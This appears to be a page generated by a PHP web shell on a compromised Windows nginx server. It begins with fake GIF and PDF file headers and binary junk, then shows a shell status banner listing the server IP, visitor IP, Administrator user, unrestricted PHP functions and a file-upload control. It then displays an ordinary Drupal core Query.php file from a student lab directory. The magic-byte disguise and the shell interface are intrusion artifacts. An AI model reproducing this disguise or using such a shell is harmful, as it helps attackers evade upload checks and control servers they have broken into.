GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Entity/Query/Null/ |
Upload File : |
<?php namespace Drupal\Core\Entity\Query\Null; use Drupal\Core\Entity\Query\QueryAggregateInterface; use Drupal\Core\Entity\Query\QueryBase; use Drupal\Core\Entity\Query\QueryInterface; use Drupal\Core\Entity\Query\Sql\ConditionAggregate; /** * Defines the entity query for configuration entities. */ class Query extends QueryBase implements QueryInterface, QueryAggregateInterface { /** * {@inheritdoc} */ public function execute() { if ($this->count) { return 0; } return []; } /** * {@inheritdoc} */ public function existsAggregate($field, $function, $langcode = NULL) { return $this->conditionAggregate->exists($field, $function, $langcode); } /** * {@inheritdoc} */ public function notExistsAggregate($field, $function, $langcode = NULL) { return $this->conditionAggregate->notExists($field, $function, $langcode); } /** * {@inheritdoc} */ public function conditionAggregateGroupFactory($conjunction = 'AND') { return new ConditionAggregate($conjunction, $this); } }